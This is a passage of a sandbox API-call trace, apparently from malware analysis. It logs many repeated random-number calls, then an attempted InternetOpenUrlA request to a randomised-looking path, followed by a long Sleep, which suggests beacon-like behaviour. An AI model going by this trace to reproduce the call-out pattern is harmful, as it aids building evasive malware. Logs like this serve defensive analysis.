BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.697] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.697] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.698] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.698] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.698] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.698] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.699] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.699] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.699] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.699] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.699] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.699] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.699] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.699] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.700] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.700] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.700] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.700] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.701] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0167.701] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1632b, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x3a1632b) returned 0x0 [0167.701] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.701] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.702] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.702] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.702] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.702] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.702] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.702] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.702] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.702] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.702] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.703] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.703] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.703] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.703] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.704] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.704] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.704] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.704] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.705] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.705] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.705] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.705] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.705] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.706] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.706] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.706] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0167.708] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.708] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0167.708] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.708] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1634e, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a1634e) returned 0x0 [0167.708] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.708] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.708] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.708] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.709] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.709] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.709] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.709] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.710] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.710] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.710] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.710] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.710] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.710] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.710] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.710] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.710] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.711] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.711] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.712] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.712] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.712] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.712] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.713] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.713] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.713] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.713] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.713] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.714] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.714] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.714] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.714] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.715] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.715] GetProcessHeap () returned 0x440000 [0167.715] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473b90 [0167.715] lstrcpyA (in: lpString1=0x473b90, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0167.715] lstrcatA (in: lpString1="\x04", lpString2="/nJ0dho2u7mk9ckzrjni4e4z4wzzydtRarg3ymjpvk/yZP0tzogXFbKhAwbYkxvfjlzDsk9pqz0xE/xwezmaa5j9DeQexdkhr1Kyu30nT4vsab11T/" | out: lpString1="\x04/nJ0dho2u7mk9ckzrjni4e4z4wzzydtRarg3ymjpvk/yZP0tzogXFbKhAwbYkxvfjlzDsk9pqz0xE/xwezmaa5j9DeQexdkhr1Kyu30nT4vsab11T/") returned="\x04/nJ0dho2u7mk9ckzrjni4e4z4wzzydtRarg3ymjpvk/yZP0tzogXFbKhAwbYkxvfjlzDsk9pqz0xE/xwezmaa5j9DeQexdkhr1Kyu30nT4vsab11T/" [0167.715] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0167.715] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/nJ0dho2u7mk9ckzrjni4e4z4wzzydtRarg3ymjpvk/yZP0tzogXFbKhAwbYkxvfjlzDsk9pqz0xE/xwezmaa5j9DeQexdkhr1Kyu30nT4vsab11T/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0167.715] GetProcessHeap () returned 0x440000 [0167.715] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473b90 | out: hHeap=0x440000) returned 1 [0167.715] GetProcessHeap () returned 0x440000 [0167.715] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16300 | out: hHeap=0x440000) returned 1 [0167.716] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0167.716] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0167.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0167.716] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0167.716] Sleep (dwMilliseconds=0x173b9) [0167.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0167.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0167.829] GetProcessHeap () returned 0x440000 [0167.829] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f54b0 [0167.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0167.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f54b1, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x4f54b1) returned 0x0 [0167.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0167.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0167.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.834] GetProcAddress (hModule=0x7ffc5bcc0000, 